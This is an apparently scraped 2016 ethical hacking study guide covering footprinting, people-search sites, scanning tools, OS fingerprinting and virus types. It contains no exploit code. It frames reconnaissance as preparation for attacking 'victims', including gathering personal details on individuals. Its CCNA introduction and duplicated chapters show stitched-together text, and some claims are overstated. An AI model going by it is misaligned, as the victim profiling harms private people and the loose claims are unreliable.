You are on page 1of 67

CERTIFIED ETHICAL HACKER

Study Guide

copyright © 2016 EAPL

1

Introduction
Welcome to the exciting world of Elysium certification program! You have picked up
this book because you want something better in career. Elysium assured to give better
technology update through this. And you have made a good decision to do career certification
in Elysium and we can help you get your best networking job, or more money and a
promotion if you are already in the field. Cisco certification can also improve your
understanding of the internetworking of more than just Cisco products: You will develop a
complete understanding of networking and how different network topologies work together
to form a network. This is beneficial to every networking job and is the reason Elysium
teaching is in such high demand, even at companies with few Cisco devices.

What Does this Book Cover?
This book covers everything you need to know in order to become CCNA certified.
However, taking the time to study and practice with routers or a router simulator is the
real key to success.
Most of the Hands-on Labs in the book assume that you have Cisco routers to play with.
If you don't you can practice with simulators and we will assist you in completing all of
the Hands-on Labs

copyright © 2016 EAPL

2

INTRODUCTION TO ETHICAL HACKING
Module Objectives
1.
2.
3.
4.
5.

Overview of Current Security Trends
Understanding the Elements of Information Security
Understanding Information Security Threats and Attacks Vectors
Overview of Hacking Concepts, Types, and Phases
Understanding Ethical Hacking Concepts and Scope

Attackers break into systems for various reasons and purposes. Therefore, it is important to
understand how malicious hackers exploit systems and the probable reasons behind the
attacks.
This module starts with an overview of the current security scenario and emerging threat
vectors. It provides an insight into the different elements of information security.

Module Flow
1.
2.
3.
4.
5.
6.

Information Security Overview
Information Security Threats and Attack Vectors
Hacking Concepts, Types, and Phases
Ethical Hacking Concepts and Scope
Information Security Controls
Information Security Laws and Standards

Information Security refers to protecting or safeguarding information and information
systems that use, store, and transmit information for unauthorised access, disclosure,
alteration, and destruction.
Information is the critical asset that organizations need to secure. If sensitive information falls
into the wrong hands, then the respective organization may suffer huge financial loss, loss of
brand reputation, lose customers, etc. In an attempt to understand how secure such critical
information resources; let us start with an overview of information security.

Case Study: Google Play Hack
Problem: Turkish hacker Ibrahim Balic has brought down Google Play’s entire system twice,
preventing developers from uploading new apps and updates to existing apps, and preventing
users from downloading content.
Cause:
Balic did not stop after that first attempt. He uploaded it again to confirm it was his work that
brought down the system. This resulted in a second DoS attack, once again causing the

copyright © 2016 EAPL

3

similar is true for computer experts. These types of hackers protect the cyberworld from every possible threat and fixes the future coming security loop holes. hacking passwords. These definitions are as follows: Hackers: A Hacker is a person who is extremely interested in exploring the things and recondite workings of any computer system or networking system. Wikipedia has defined hackers in the following way… “Hacking is unauthorized use of computer and network resources. media has erroneously used the Hacker word with a Cracker. For many years. DIFFERENCE BETWEEN HACKER AND CRACKER There are lots of articles on internet about the difference between Hackers and Crackers. In this book we will provide you these ways in order of their acceptance in the computer and IT market.e First you Hack the Systems and find out the loop holes and then try to correct those Loop Holes. they are called criminals because they are having the mind-set of causing harm to security and they copyright © 2016 EAPL 4 . As a result. it now has negative implications. developers and users were unable to upload or download any applications. Some uses their techniques and expertize to help the others and secure the systems or networks and some misuses them and use that for their own selfish reasons. The greatness of misconception you can determine from the fact that world’s biggest authentic source WIKIPEDIA has defined hackers in a incorrect way. Crackers: A Crackers or Black Hat hackers or cheaters or simply criminals. These are also called Ethical Hackers or white hat hackers. So the general public now believes hacker is someone who breaks into computer systems.)” There is a very thin line difference between the hacker and cracker. i. Like a coin has two faces heads or tails. with easier access to multiple systems. These peoples are also called as “GURU’s” of Computer Security.database to crash. In recent years though. There are several traditional ways that determines the difference between the hackers and crackers. (The term “Hacker” originally meant a very gifted programmer. Ethical Hacking Means you think like Hackers. First of all. hackers are the expert programmers. let me provide you the basic definitions of both hackers and crackers. But this is absolutely untrue and it demoralizes some of our most talented hackers. websites and misuses them. Most often. And the technique or hacking they perform is called ethical hacking.

until and unless an ethical hacker thinks like a cracker you can never become an expert ethical hacker because to get most out of any computer system you must understand the mind-set of crackers that what they can do and up to what level they can damage. Phishers also come in this category who steals account info and steal your credit card nos. BEST OPERATING SYSTEM FOR HACKERS Most of users confused about which operating system is best for hackers and for doing hacking activities like hacking wireless network passwords. Below is the Diagrams which shows the basic difference between cracker or black hat hackers and Hackers or ethical hackers or white hat hackers. and money over the Net. network sniffers. And the most important thing. reverse engineering tools. We hope this will help you to clear most of your doubts about hackers and crackers. application hacking tools and other encrypting and spoofing hacking tools. copyright © 2016 EAPL 5 . Here we suggest operating system is Backtrack or kali Linux.steals very useful data and use it in wrong ways. Now when you will identify the vulnerabilities and loopholes. And black hat hackers are intelligent peoples but criminals or simply cyber cops call them evil genius. If you fixes them so that in future anyone cannot breach that same vulnerability then you are Hacker or ethical hacker or White Hat hacker and if you utilize that loophole of misdeeds or for fun then its cracking or Black hat hacking.

But you can also give a try to Matriux Operating System and knoppix. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date. See. Now let’s discuss more about functionality of Backtrack operating system. Back Track is quite possibly the most comprehensive Linux distribution of security tools. or using your favorite thumb drive. booting from a Live DVD. it provides an easy access to software that facilitates exploitations for secured systems and other reverse engineering. script and patch solely for the purpose of the penetration tester. Regardless if you’re making BackTrack your primary operating system. kernel configuration. Both hackers and crackers can appreciate the features of this distribution. For white-hatters. everybody wins! Major Features of BackTrack Linux copyright © 2016 EAPL 6 . Best Operating System: Backtrack Linux BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. it is a penetration tester that finds holes in a security scheme. BackTrack has been customized down to every package. For black-hat hackers. Matriux OS is just awesome but it’s still under construction as designers are still working on it and patching it. BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field.

BackTrack features the latest in security penetration software. The current Linux
kernel is patched so that special driver installation is unnecessary for attacks. For
example, an Atheros-based wireless networking adapter will no enter monitor mode
or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need
to worry about that. It’s just plug-and-play ready-to-go!
What’s great is that this Linux distribution comes Live-on-CD. So, no installation is
needed. However, what you experience BackTrack, you will realize that it is a must to
download this operating system and install it on your Laptop. At the very least,
download the VMWare Virtual Appliance for Backtrack. Make sure you also install
the VMWare Tools for Linux as well. Many features will still work in VMWare mode.

Based on: Debian, Ubuntu

Origin: Switzerland

Architecture: i386

Desktop: Fluxbox, KDE

Category: Forensics, Rescue, Live Medium

Cost: Free
Hacking Tools:
BackTrack provides users with easy access to a comprehensive and large collection of
security-related tools ranging from port scanners to password crackers. Support for
Live CD and Live USB functionality allows users to boot BackTrack directly from
portable media without requiring installation, though permanent installation to hard
disk is also an option.
BackTrack includes many well known security tools including:

Metasploit integration

RFMON Injection capable wireless drivers

Kismet

Nmap

Ettercap

Wireshark (formerly known as Ethereal)

BeEF (Browser Exploitation Framework)
A large collection of exploits as well as more common place software such as
browsers. BackTrack arranges tools into 11 categories:

Information Gathering

Network Mapping

Vulnerability Identification

Web Application Analysis

Radio Network Analysis (802.11, Bluetooth, Rfid)

Penetration (Exploit & Social Engineering Toolkit)

Privilege Escalation

Maintaining Access
copyright © 2016 EAPL

7



Digital Forensics
Reverse Engineering
Voice Over IP

CHAPTER – 1 FOOT PRINTING
Footprinting and How It can be HelpFul to Hack systems

copyright © 2016 EAPL

8

What Is FOOTPRINTING?
Basically footprint is the blueprints of site/organisation/system that a hacker want to Hack i.e
basic internal structure.Footprinting is the blueprint of the security profile of an
organization, undertaken in a methodological manner.
Footprinting is one of the three pre-attack phases. The others are scanning and enumeration.
Important Thing to be Noted : An attacker will spend 90% of the time in profiling an
organization and another 10% in launching the attack.
Footprinting results in a unique organization profile with respect to networks
(Internet/intranet/extranet /wireless) and systems involved.Don’t It look amazing…
The most interesting stage of a targeted attack is the reconnaissance, or footprint analysis.
Here you use the web, search engines, whois.com, to discover as much about the target as
possible. A whois.com can tell you email address formats for instance (first letter last name @
company.com).
A Google search could reveal submission to forums by security personnel that reveal brands
of firewall or antivirus in use at the target. Sometimes network diagrams are even found that
can guide an attack. The next stage, scanning, meant using special tools, ( I date myself by
mentioning Cybercop and Internet Security Scanner, these were the days before the open
source Nessus) to discover open ports, services, and machines on the target network. And
then, finally, you could start attacking various vulnerabilities that you had discovered.
SITES THAT HELP IN FOOTPRINTING!
1. www.whois.domaintools.com
Now How It can Help You To GET

copyright © 2016 EAPL

9

Info . I will Show It Through Snapshots… copyright © 2016 EAPL 10 .

copyright © 2016 EAPL 11 .2.. Now you can use this information to search more about Person using Simply google as shown in next snapshot.

Now Its on you need How much info u want to explore about the person and website which u want to hack… copyright © 2016 EAPL 12 .

I uses BSNL but its showing airtel because I prefer DNS of Airtel for surfing Quick). I will explain Few More interesting facts and information exploring things so read on… UNEARTHING BASIC INFORMATION First of all We will focus on Unearthing the Basic Information about the site… i.e the our IP that is being analyzed by website) 3. WE will continue Our Discussion on FOOTPRINTING tomorrow also… As It is the Most Important Phase….com Here we will use two basic commands in command Prompt(cmd): tracert www.com It will look something like this: We trace routed www. After This We will came to now the IP of the Website and Ip of itz web servers which are being used further. Next steps showing the Ip’s of Webservers through which amulive is being maintained. Shows Connectivity passes through which service Provider.websitename. 2. We will Explore More Information in the Next class…. Shows our Outgoing Footprint Ip(i.e the IP and server informations... website Ip can be used to gather more information about the website. Shows Our Gateway of connectivity. copyright © 2016 EAPL 13 .com and ping www.webistetobeanlysed.amulive.I think you all Will Like Thisss…..com 1.websitename. I will Show you with the help on snapshots : First go to START –> RUN —>type cmd—>then type tracert www.

http://people. http://www. Its also helpful in finding the fake profiles… But unfortuantely this is limited But we can use it to the Most… There are two website which will help us… 1.intellius.com ( best Site To trace People for their Personal Information and also reverse Phone or mobile number Look up) 2.com ( But this site is limited to US only) Sample Report from Intellius : copyright © 2016 EAPL 14 .How to Find The Personal Information About the Individual Over Net ?? Its one of the Most important task.yahoo.

it will scrape the websites on that domain. /~user) Similar domains copyright © 2016 EAPL 15 . not Windows domains).. I’m referring to the DNS kind.com/spiderfoot/ Information about SpiderFoot: SpiderFoot is a free. Netcraft. as well as search Google. domain footprinting tool.Satellite Picture of Joe’s House from Intellius: Now Using these Sites you will be able to collect the personal information of the individuals and also being able to identify the fake profiles.e. TOOLS NEEDED FOR FOOTPRINTING : You can avoid above hectic work by using this tool : SpiderFoot Download link: http://www. Given one or multiple domain names (and when I say domains.binarypool. Whois and DNS to build up information like:      Subdomains Affiliates Web server versions Users (i. open-source.

  Email addresses Netblocks ADDITIONAL FOOTPRINTING TOOLS : Note all these tools are freewares ..             Whois Nslookup ARIN Neo Trace VisualRoute Trace SmartWhois eMailTrackerPro Website watcher Google Earth GEO Spider HTTrack Web Copier E-mail Spider This is all about Footprinting . Now Use the Gathered information to make basic Detailed Information about the Website/person… copyright © 2016 EAPL 16 .. U can easily google then and download these.

CHAPTER – 2 SCANNING NETWORKS Scanning and Attacking Open Ports In Scanning Part We Will Cover the Following Topics in details : ~ Definition of scanning ~ Types and objectives of Scanning ~ Understanding Scanning methodology ~ Checking live systems and open ports ~ Understanding scanning techniques ~ Different tools present to perform Scanning ~ Understanding banner grabbing and OS fingerprinting ~ Drawing network diagrams of vulnerable hosts ~ Preparing proxies ~ Understanding anonymizers ~ Scanning countermeasures What Is Scanning ?? And Why We Focus On that ? Scanning as from the name means that we will scan something to find some details etc etc… Scanning basically refers to the gathering of following four informations… We Scan systems for four basic purposes :- copyright © 2016 EAPL 17 .

~ To discover the operating system running on the target system (fingerprinting).e why do we do scanning : ~ To detect the live systems running on the network.and attack the victim through that … OBJECTIVES OF SCANNING These are Primary objectives of scanning i. We will prefer TOOLS for this because they will reduce our Hectic Work… The first Tool that we Use is the NMAP : DOWNLOAD :http://nmap. In this type of scanning We scan the systems for finding the vulnerability i. ~ To discover the services running on the target system. Network Scanning : Network scanning is basically a procedure of finding the active hosts on the Network.org/dist/nmap-5. In Port scanning we scan for the open Ports which can be used to attack the victim computer. i.e the weakness in OS/database … Once we find the vulnerability or loop hole we can utilize it to Best..    To find specific IP address Operating system System Architecture Services Running on system The various types of scanning are as follows: ~Port Scanning ~Network Scanning ~Vulnerability Scanning I want to Define These Terms here Only as they are of great use in further tutorial… PORT SCANNING : There are 64k ports in a computer out of which 1k are fixed for system or OS services.00-setup.exe copyright © 2016 EAPL 18 . In Port scanning a series of messages sent to break into a computer to learn about the computer’s network services. Through this we will know that which port we will use to attack the victim. ~ To discover which ports are active/running.e We tries to find that system is standalone or multiuser… This is done either for the purpose of attacking them or for network security assessment i.e how secured the network Is ?? Vulnerability Scanning : As from the name .. ~ To discover the IP address of the target system.

~ It is supported by many operating systems. ping sweep. and mass e-mailers. version detection.html ~ Net Tools Suite Pack is a collection of scanning tools. copyright © 2016 EAPL 19 . web rippers.Features of NMAP : ~ Nmap is used to carry out port scanning.com/progDownload/Net-Tools-Download-22193.softpedia. Note: Some of these tools may not Work but some are too good. flooders. OS detection. ~ This toolset contains tons of port scanners.0.70 : Itz is a collection of various Networking Tools … must for beginners… DOWNLOAD: http://www. ~ It scans a large number of machines at one time. ~ It can carry out all types of port scanning techniques. SECOND TOOL IS NET TOOLS 5. and many other techniques.

copyright © 2016 EAPL 20 .

Specially crafted packets are sent to remote OSs and response is noted.  machine you cannot connect to (RST+ mode).cx/p0f-win32. The two different types of fingerprinting are: • Active stack fingerprinting • Passive fingerprinting Active Stack FingerPrinting: Based on the fact that OS vendors implement the TCP stack differently.First of Which is OS Fingerprinting… What is OS Fingerprinting ?? OS fingerprinting is the method to determine the operating system that is running on the target system. It is also based on the differential implantation of the stack and the various ways an OS responds to it.zip P0f v2 is a versatile passive OS fingerprinting tool. It uses sniffing techniques instead of the scanning techniques. It is less accurate than active fingerprinting. OC3. The responses are then compared with a database to determine the OS. Passive FingerPrinting: Passive banner grabbing refers to indirectly scanning a system to reveal its server’s operating system. other guy’s network hookup (DSL. existence of a load balancer setup. avian carriers) and his ISP. TOOL USED FOR OS FINGERPRINTING :p0f Os Fingerprinting Tool DOWNLOAD: http://lcamtuf. copyright © 2016 EAPL 21 . P0f can also do many other tricks. the distance to the remote system and its uptime. P0f can identify the operating system on:  machines that connect to your box (SYN mode).  machines you connect to (SYN+ACK mode). and can detect or measure the following:     firewall presence.  machines whose communications you can observe. NAT use (useful for policy enforcement).coredump.

sensitive data discovery and vulnerability analysis of your security posture.system. is the world-leader in active scanners. inside DMZs.. asset profiling. Retina NESSUS The Nessus® vulnerability scanner.What is Vulnerability??? As I have Told in First class that Vulnerability is weakness in the network. featuring high speed discovery. and across physically separate networks. configuration auditing. Nessus scanners can be distributed throughout an entire enterprise. Nessus 2.database etc… We can call vulnerability as the Loophole i. We first analyze the loophole and then try to use it to best to Hack the System of victim or oraganisation or website… TOOL THAT WE USE FOR VULNERABILITY SCANNING ARE : 1. copyright © 2016 EAPL 22 .e through which victim can be attacked.

Features: ~ Plug-in-architecture ~ NASL (Nessus Attack Scripting Language) ~ Can test unlimited number of hosts simultaneously ~ Smart service recognition ~ Client-server architecture ~ Smart plug-ins ~ Up-to-date security vulnerability database SAMPLE SNAPSHOT: copyright © 2016 EAPL 23 .

enabling security best practices.org/download/ RETINA Retina Network Security Scanner. copyright © 2016 EAPL 24 .nessus. policy enforcement.DOW NLOAD NESSUS : http://www. identifies known and zero day vulnerabilities plus provides security risk assessment. and regulatory audits. the industry and government standard for multi-platform vulnerability management.

networking devices. and third party or custom applications. including a variety of operating system platforms.Features: ~ Retina network security scanner is a network vulnerability assessment scanner. databases. SAMPLE SNAPSHOT: copyright © 2016 EAPL 25 . ~ It can scan every machine on the target network. ~ It has the most comprehensive and up-to-date vulnerability database and scanning technology.

In Next Class We will Discuss what are Proxies and How they work and how they are going to Help us and some undetectable and untraceable Proxy servers… SCANNING AND ATTACKING OPEN PORTS In my Previous class I have explained about footprinting i.com/html/products/retina/download/index.DOWNLOAD RETINA: http://www.. In this class you will came to know why we have undergo footprinting and analysis part… In Scanning Part We Will Cover the Following Topics in details : ~ ~ ~ ~ ~ ~ ~ ~ ~ Definition of scanning Types and objectives of Scanning Understanding Scanning methodology Checking live systems and open ports Understanding scanning techniques Different tools present to perform Scanning Understanding banner grabbing and OS fingerprinting Drawing network diagrams of vulnerable hosts Preparing proxies copyright © 2016 EAPL 26 ... This risk can be reduced to great extent by using Proxies.eeye. You all were thinking that what was the use of that .html Now After Scanning the Systems for Vulnerabilites . We will Now Going to attack the Systems but before this we should know the Risk ..e getting the IP of the Person/website/organisation whom you want to attack and extracting the personal Information.

~ Understanding anonymizers ~ Scanning countermeasures What Is Scanning ?? And Why We Focus On that ? Scanning as from the name means that we will scan something to find some details etc etc… Scanning basically refers to the gathering of following four informations… We Scan systems for four basic purposes :-  To find specific IP address  Operating system  System Architecture  Services Running on system The various types of scanning are as follows: ~Port Scanning ~Network Scanning ~Vulnerability Scanning copyright © 2016 EAPL 27 .

I want to Define These Terms here Only as they are of great use in further tutorial… PORT SCANNING : There are 64k ports in a computer out of which 1k are fixed for system or OS services. version detection.e the weakness in OS/database … Once we find the vulnerability or loop hole we can utilize it to Best.e We tries to find that system is standalone or multiuser… This is done either for the purpose of attacking them or for network security assessment i. In this type of scanning We scan the systems for finding the vulnerability i.e why do we do scanning : ~ To detect the live systems running on the network. We will prefer TOOLS for this because they will reduce our Hectic Work… The first Tool that we Use is the NMAP : DOWNLOAD :http://nmap.exe Features of NMAP : ~ Nmap is used to carry out port scanning. Network Scanning : Network scanning is basically a procedure of finding the active hosts on the Network. ~ To discover the operating system running on the target system (fingerprinting). ~ To discover which ports are active/running. i..org/dist/nmap-5.. ~ It is supported by many operating systems. ~ It scans a large number of machines at one time. copyright © 2016 EAPL 28 . In Port scanning we scan for the open Ports which can be used to attack the victim computer. ~ To discover the IP address of the target system. ping sweep.and attack the victim through that … OBJECTIVES OF SCANNING These are Primary objectives of scanning i. In Port scanning a series of messages sent to break into a computer to learn about the computer’s network services.e how secured the network Is ?? Vulnerability Scanning : As from the name . ~ To discover the services running on the target system.00-setup. Through this we will know that which port we will use to attack the victim. OS detection. and many other techniques.

web rippers.0.~ It can carry out all types of port scanning techniques. Note: Some of these tools may not Work but some are too good. ~ This toolset contains tons of port scanners. SECOND TOOL IS NET TOOLS 5. copyright © 2016 EAPL 29 . and mass e-mailers. flooders.html ~ Net Tools Suite Pack is a collection of scanning tools.com/progDownload/Net-Tools-Download-22193.70 : Itz is a collection of various Networking Tools … must for beginners… DOWNLOAD: http://www.softpedia.

.I thisnk that’s Enough for Today .We will discuss more on scanning tomorrow Until You try these tools.. If you have any problem in Using these tools then you can ask me .I will help you use these tools… copyright © 2016 EAPL 30 .

Viruses. And How they work to infect the system. VIRUSES: Virus is a self-replicating program that produces its own code by attaching copies of itself into other executable codes like executive files(.Dynamic link Library’s(. Backdoors. In today’s Class I will going to Introduce What are Trojans. In later classes we will discuss more about them Like How to Get rid of Viruses. Trojans etc. worms etc. After a heavy Busy Schedule I come with the Next Hacking Tutorial. VIRUSES AND BACKDOORS Welcome Back Guys.. So Guys Keep Reading. Virus Generally operates in the background and offcourse without the Desire of the User as Noone want that virus to harm their computer. How to remove them and the Most Important How to Use them for Hacking Victims systems etc.INTRODUCTION TO TROJANS...exe) .ROFL :P Some Well-known Characteristics of Viruses:  Resides in the memory and replicates itself while the program where it attached is running  Does not reside in the memory after the execution of program  Can transform themselves by changing codes to appear different copyright © 2016 EAPL 31 ..dlls) etc.. I think everybody who is using computer has faced the problem of viruses at least once in life. Lets Start With Viruses… What are These and How they Work.

Encrypts itself into cryptic symbols (encodes themselves with special Characters) 2. Attack Phase: – Some viruses have trigger events to activate and corrupt systems – Some viruses have bugs which replicate and perform activities like file deletion. Uses stealth algorithms to redirect disk data WORKING OF VIRUSES: Generally most of the Viruses Works in two Phases: 1. 1. increasing session time – They corrupt the targets only after spreading completely as intended by their developers It will be much more clear From the Snapshot that How the Virus Works: copyright © 2016 EAPL 32 . or a particular event Ex: TSR viruses which get loaded into memory and infect at later stages 2. Infection Phase: – Virus developers decide when to infect host system’s programs – Some infect each time they are run and executed completely. Alters the disk directory data to compensate the additional virus bytes(changes the the location of the file by adding one additional bit to data location) 3. Attack Phase From the name you can have the Idea what are these Phases . time. Ex: Direct Viruses – Some virus codes infect only when users trigger them which include a day.Hides itself from detection by three ways: 1. Infection Phase 2.

Fig: Attack Phase that how the Files are got Fragmented and system speed Slows Down copyright © 2016 EAPL 33 .Fig: Infection Phase that how file is attached to .exe files to infect Programs.

Why People Create Viruses?? I think Everybody thinking of that why people creates Viruses and which people Creates them.. Some of he Most Common Reasons are Discussed Below: • • • • • • • • Research projects (People Doing Research Work Detect the Flaws in particular system and creates Code for that) Pranks(Just for fun like us people who just creates viruses for irritating frens) Vandalism To attack the products of specific companies (like Microsoft Products Xp..Windows 7 etc.. you can suspect a virus attack that is Processes take more resources and are time consuming than previous i..) To distribute political messages Financial gain(Stealing Money from accounts etc. hahahaha Real Question that comes to my Mind when I was Newbie in this field. If the system acts in an unprecedented manner.Vista.) Identity theft Spyware (to Monitor the Working of Remote Computers) SYMPTOMS OF VIRUS ATTACKS: Hey guys below I have mentioned some symptoms that will indicate that your system is infected from viruses.e System hangs frequently… Some More are mentioned Below: – If computer beeps with no display – If one out of two anti-virus programs report virus on the system – If the label of the hard drive change – Your computer freezes frequently or encounters errors – Your computer slows down when programs are started – You are unable to load the operating system – Files and folders are suddenly missing or their content changes – Your hard drive is accessed too often (the light on your main unit flashes rapidly) – Microsoft Internet Explorer “freezes” – Your friends mention that they have received messages from you but you never sent such messages copyright © 2016 EAPL 34 .

2. Files have strange names which are not recognizable. copyright © 2016 EAPL 35 . 3. HOW THE VIRUS DOES INFECTS THE SYSTEM?? Viruses infect the system in the following ways: 1. he/she launches the infected program. so the execution time increases) . Programs act erratically (Programs Gives errors on use) Resources are used up easily (can be Easily viewed using task manager). How To Detect Your System is Infected by Virus?? This is one of the major question to answer and the simplest answer to it is that there are some General Indications that Indicates that System is infected or Not.DIFFERENCE BETWEEN WORMS AND VIRUSES Most of us thinks that worms are viruses and their working is similar to viruses but this not the real scenario. There is a Big difference between the general viruses and Worms. Appends the malicious code to a legitimate program which is Important to the user. Computer’s hard drive constantly runs out of free space. 4. Loads itself into memory and checks for executable on the disk. As a result of the infected program being executes. other programs get infected as well. A worm spreads through the infected network automatically but a virus does not. A worm is a special type of virus that can replicate itself and use memory. 5. General Indications are stated Below:      Programs take longer to load than normal (because virus halts the normal working of programs as it attaches itself to it. Since the user is unaware of the replacement. but cannot attach itself to other programs. The above cycle continues until the user realizes the anomaly within the system.

STAGES OF VIRUS LIFE CYCLE FROM DESIGN TO ELIMINATION The life cycle indicated above is a general life cycle of the Virus from design Phase to Elimination phase… VIRUS CLASSIFICATION – TYPES OF VIRUSES Viruses are classified on the basis of two basic Things: 1. excel and access. How they infect Examples: System Sector or Boot Virus: . File Virus: - Infects executable in OS file system. Macro Virus: .Infects disk boot sectors and records. spreadsheets and databases such as word. Source Code copyright © 2016 EAPL 36 . What they Infect 2.Infects documents.

Self-Modification Virus Most modern antivirus programs try to find virus-patterns inside ordinary programs by scanning them for virus signatures. The virus can then return an uninfected version of the file to the anti-virus software.Virus: - Overwrites or appends host code by adding Trojan code in it. Bootable CD-ROM Virus These are a new type of virus that destroys the hard disk data content when booted with the infected CD-ROM. A virus can hide itself by intercepting the anti-virus software’s request to read the file and passing the request to the virus. They rely on infected floppy disk left in the drive when the computer starts. When you boot the computer using the CD-ROM. so that it appears as if the file is “clean”. These boot viruses use all of the common viral techniques to infect and hide themselves. Example: Someone might give you a LINUX BOOTABLE CD-ROM. Network Virus: •Spreads itself via email by using command and protocols of computer network. A signature is a characteristic byte-pattern that is part of a certain virus or family of viruses. they can also be “dropped” by some file infectors or Trojans. instead of the OS. No Anti-virus can stop this because AV software or the OS is not even loaded when you boot from a CD-ROM. System sectors (Master Boot Record and DOS Boot Record) are often targets for viruses. These viruses modify their code on each infection. (each infected file contains a different variant of the virus) Polymorphic Code Virus copyright © 2016 EAPL 37 . all your data is gone. Self-modification viruses employ techniques that make detection by means of signatures difficult or impossible. Stealth Virus These viruses evade anti-virus software by intercepting its requests to the operating system. Different Types of Virus and Worms Explained System Sector Viruses System sectors are special areas on your disk containing programs that are executed when you boot (start) your PC.

This is really an executable Visual Basic Script virus file and could do serious damage . .TXT. W32/Simile consisted of over 14000 lines of assembly code. you might think this is a text file and open it.A well-written polymorphic virus therefore has no parts that stay the same on each infection. and then back to normal code again.TXT is safe as it indicates a pure text file. the virus has to have a polymorphic engine (also called mutating engine or mutation engine). With extensions turned off if someone sends you a file named BAD. Metamorphic Virus Metamorphic viruses rewrite themselves completely each time they are to infect new executables.To enable polymorphic code. For example. Polymorphic code is a code that mutates while keeping the original algorithm intact.TXT. Metamorphic code is a code that can reprogram itself by translating its own code into a temporary representation. Countermeasure is to turn off “Hide file extensions” in Windows. File Extension Virus File extension viruses change the extensions of files.VBS you will only see BAD. copyright © 2016 EAPL 38 . 90% of it is part of the metamorphic engine.If you’ve forgotten that extensions are actually turned off.

Various Error messages appear on Screen when you open something or without opening also. some might be knowing this but by some reason they have ignored them. anti-spyware etc. How a System is got Infected because to Negligence? 1. Using Cracked Versions of software specially security ones like antivirus. I will tell all the ways How your system can be Get infected and How you can protect it if its already infected How you can resolve the problem. or in some cases you have tried to find the answer but you are not able to get proper answer. So here are few things How your System got Infected . Surely No. We know that almost all antivirus show each and every keygen as virus or some trojan depending upon its type. 6. 3. 5. Why I have said this is the first and major cause of infection because of the following simple reason that All hackers know that general internet user public always searches for cracked versions of software’s and wishes to use them for free and Hacker take benefit of them. and much more… Have you ever think about the reason why your system is got infected. The most important antivirus shows messages of detecting viruses time to time. System start up takes too much time to start. Now if we all know that then how come hackers will forget this fact so what they do they attaches trojans and viruses to these files and at the time When your antivirus shows it as virus copyright © 2016 EAPL 39 . You all now be thinking how it help hackers. While scanning your system from any antivirus or anti spyware tool its showing viruses and you noticed that viruses are not deleting. 7. What has infected your system and if its done by any of your friend How he has done it. But story is different here . System registry has been disabled or folder options is missing. 4.How to stop virus or trojan attacks If you want to know that your system is either infected by viruses and trojans then these are certain techniques to know that: 1. Some programs might open without your permission. 2. Your Computer might be running slow usual than normal.

Now how a virus enters into your system using USB drives. Pen drive or USB drive : The biggest cause of infection of your system is usb drives and external hard disks. Don’t worry when I am there no fear drink beer and enjoy everything for free. Now hackers know the fact that Katrina has a huge fan following and user will surely going to download it. Now you all be thinking that if we don’t use the cracked versions then how we will able to get full versions of the software’s. Now how it affects your system suppose you want to download any wallpaper say Katrina Kaif. For USB drive virus solution keep reading article. Now if you are using good antivirus . Now I don’t say that stop hacking but try to follow some basic steps to learn hacking and first of all you must know how to protect yourself from such type of fake software’s. So what is the moral of story Please don’t use cracked versions. If your antivirus doesn’t show any keygen or crack as a virus then don’t ever think that its not a virus but its a most dangerous thing. Its solution will be in solutions step just read article. So when you connect your USB to your friends computer your USB is now infected by virus and now when you connect this USB to your PC using the property of your Windows that it searches the files in Newly connected device and autorun the device and for doing this it loads the index of your USB’s file system into Memory and now if USB has virus its the property of virus its replicates itself using system memory. Then what they do they simply bind their malicious codes with some of files and when users download it his system is infected and he can never imagine that the virus has come from wallpaper that he has downloaded from unknown site. Downloading things from Unknown Sites: Most of the users searches for thing over the internet and where ever they find their desired result means file that they want they start downloading that from that site only. NOTE: And Guys an important note for you all.you ignores the alert and keep the keygen means trojan running. You have connected your USB drive to your friends computer and by chance (sorry its for sure i. For its solution read on article. 3. 2.9% of this shit contains viruses and Trojans that sends your information to the providers. your antivirus will pop warning and alert messages and some times you ignores them means your system is also infected. The most important one Becoming a Hacker like Me (ROFL but its truth). Why I have mentioned this you might be clear from the above discussion. For its solution read on article. Most of the internet users always curious to know ways how can i hack my friends email account or his system for these they download all type of shit from the internet and believe me 99. 4.e 100%) your friends system is infected by virus or Trojans and its the property of Virus that it replicates itself using memory. copyright © 2016 EAPL 40 . Why dangerous because now Hacker has used some more brain to fool you that is he has made the virus undetectable simply edit the hex code of original virus.

e Antivir. Click on “General” Now click on select all and click on apply. In general tab only go to WMI section and click on advanced process protection and then click on apply. Just click on it now a new window will pop up. Click on “Scanner” click on all files and set the “Scanner Priority” to high and click on apply. a. Don’t worry its not your work it will update itself automatically whenever update is available.filehippo. Its time You should Know How to fix them and protect your system from all types of viruses and trojans. There are several other solutions to them that you will get for absolutely Free and I guarantee that it will protect your system 100% just doing some little configurations. Best Free Anti-Spyware: Spyware Terminator with crawler Web security toolbar. After doing that restart your PC. c. Best Free Antivirus : Avira Personal Antivirus i. Using Good Antivirus: There is a nice misconception between the internet users that full antivirus provides better security. Now There at left hand top you will see a click box in front of Expert is written . You can download avira for free from : http://www. Ya its 100% truth but full antiviruses paid ones not the cracked ones. Now do the following setting one by one. Download It for free : copyright © 2016 EAPL 41 . Click on “Guard” and click on all files and click on “Scan while reading and writing” and then click apply.Now after discussing the things How you system is got infected by your simple negligence. 4. After Installing at the right hand top corner you will see a “CONFIGURATION” button.. Install the antivirus and update it.com/download_antivir/ Now after downloading the antivirus what you have to do to make it as good as paid antiviruses. Now you have made your free antivirus an equivalent to the paid one. 1. Note updating antivirus regularly is compulsory. HOW TO STOP VIRUS OR TROJANS ?? 1. 2. 3. Click on that now you will see several things in it. b.

